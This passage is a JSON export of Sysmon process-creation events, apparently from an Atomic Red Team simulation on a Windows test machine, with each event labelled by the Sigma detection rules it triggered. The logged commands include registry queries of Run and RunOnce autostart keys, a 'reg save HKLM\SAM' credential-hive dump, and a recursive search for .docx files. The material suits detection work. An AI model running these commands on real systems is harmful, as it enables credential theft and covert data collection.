(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ParentProcessId":1740,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010C86B3100","ProcessId":644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.931"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3702,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.937862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ProcessId":4220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3703,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.975133Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ParentProcessId":4220,"ProcessGuid":"747F3D96-D87C-5D31-0000-001057703100","ProcessId":6620,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3704,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.990533Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ProcessId":196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.019"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3705,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.036329Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ParentProcessId":196,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010E2743100","ProcessId":3172,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3706,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.059631Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ProcessId":2148,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.113"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3707,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.147861Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ParentProcessId":2148,"ProcessGuid":"747F3D96-D87D-5D31-0000-00107D793100","ProcessId":1472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3708,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.175813Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ProcessId":3616,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3709,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.225776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ParentProcessId":3616,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010057E3100","ProcessId":1340,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3710,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.251689Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00103B803100","ParentProcessId":324,"ProcessGuid":"747F3D96-D87D-5D31-0000-00108D823100","ProcessId":1224,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3712,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.331942Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010CA843100","ParentProcessId":3900,"ProcessGuid":"747F3D96-D87D-5D31-0000-00101C873100","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.383"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3714,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.392501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ProcessId":3868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.541"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3715,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.559318Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ParentProcessId":3868,"ProcessGuid":"747F3D96-D87D-5D31-0000-00104C8D3100","ProcessId":6536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.568"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3716,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:33.572021Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D885-5D31-0000-00107F1A3200","ProcessId":2832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:41.646"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3721,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:41.660271Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ProcessId":2780,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:51.971"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3724,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:51.996250Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ParentProcessId":2780,"ProcessGuid":"747F3D96-D890-5D31-0000-001012383200","ProcessId":608,"Product":"Microsoft® Windows® Operating 